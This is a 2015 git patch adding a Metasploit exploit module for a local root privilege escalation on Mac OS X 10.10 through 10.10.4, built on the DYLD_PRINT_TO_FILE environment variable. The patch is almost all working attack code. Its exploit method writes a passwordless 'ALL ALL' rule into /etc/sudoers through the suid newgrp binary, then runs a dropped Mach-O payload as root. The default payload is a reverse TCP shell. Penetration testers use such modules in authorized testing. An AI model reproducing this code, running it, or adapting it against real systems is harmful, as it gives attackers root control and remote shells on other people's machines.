From 3013ab472440f77df971884e48c6d13ea4fac81c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Tue, 21 Jul 2015 21:43:51 -0500
Subject: [PATCH] Add osx root privilege escalation.

---
 .../osx/local/dlyd_print_to_file_root.rb      | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/exploits/osx/local/dlyd_print_to_file_root.rb

diff --git a/modules/exploits/osx/local/dlyd_print_to_file_root.rb b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
new file mode 100644
index 0000000000..8a68275e8f
--- /dev/null
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
+      'Description'    => %q{
+        In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
+        supported for suid binaries. This allows an arbitrary file write as root.
+      },
+      'Author'         => [
+        'Stefan Esser', # Vulnerability discovery and PoC
+        'joev'          # Copy/paste monkey
+      ],
+      'References'     => [
+        ['URL',   'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+      ],
+      'DisclosureDate' => 'Jul 21 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Mac OS X 10.10-10.10.4', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp'
+      }
+    ))
+
+    register_options([
+      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ])
+  end
+
+  def exploit
+    print_status("Writing payload to `#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+    cmd_exec("chmod +x #{payload_file}")
+
+    print_status("Executing exploit at #{payload_file}...")
+    cmd_exec(sploit)
+  end
+
+  def check
+    (ver?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.10.0'), Gem::Version.new('10.10.4')
+    )
+  end
+
+  def sploit
+    %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
+      %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
+      %Q|/bin/sh -c 'sudo #{payload_file} &'|
+  end
+
+  def binary_payload
+    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+  end
+
+  def payload_file
+    @payload_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+end